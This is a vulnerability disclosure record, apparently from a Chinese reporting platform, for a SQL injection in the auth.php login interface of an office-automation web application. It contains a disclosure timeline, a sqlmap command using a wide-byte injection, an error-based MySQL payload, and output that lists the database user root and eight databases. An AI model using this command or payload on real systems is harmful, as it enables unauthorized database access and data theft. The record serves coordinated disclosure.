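2015-10-22: Details reported to the vendor; awaiting vendor response
2015-10-26: Vendor confirmed; details disclosed to the vendor only
2015-11-05: Details disclosed to core white hats and relevant domain experts
2015-11-15: Details disclosed to regular white hats
2015-11-25: Details disclosed to trainee white hats
2015-12-10: Details disclosed to the public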
sqlmap -u "**.**.**.**/interface/auth.php?&PASSWORD=1&USER_ID=%df%27%20" --dbms mysql --tamper=between
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: USER_ID
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 9859 FROM(SELECT COUNT(*),CONCAT(0x7169726871,(SELECT (CASE WHEN (9859=9859) THEN 1 ELSE 0 END)),0x7172706871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hKjO
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current database: 'td_oa'
current user: 'root@**.**.**.**'
available databases [8]:
[*] BUS
[*] crscell
[*] information_schema
[*] mysql
[*] performance_schema
[*] TD_OA
[*] TD_OA_ARCHIVE
[*] TRAIN

Database: TD_OA
[419 tables]
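Parameter filtering
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-10-26 16:49
CNVD confirmed and reproduced the reported issue. It has been passed to CNCERT to notify China Telecom Group Corporation, which will coordinate follow-up handling with the department that manages the website.
None yet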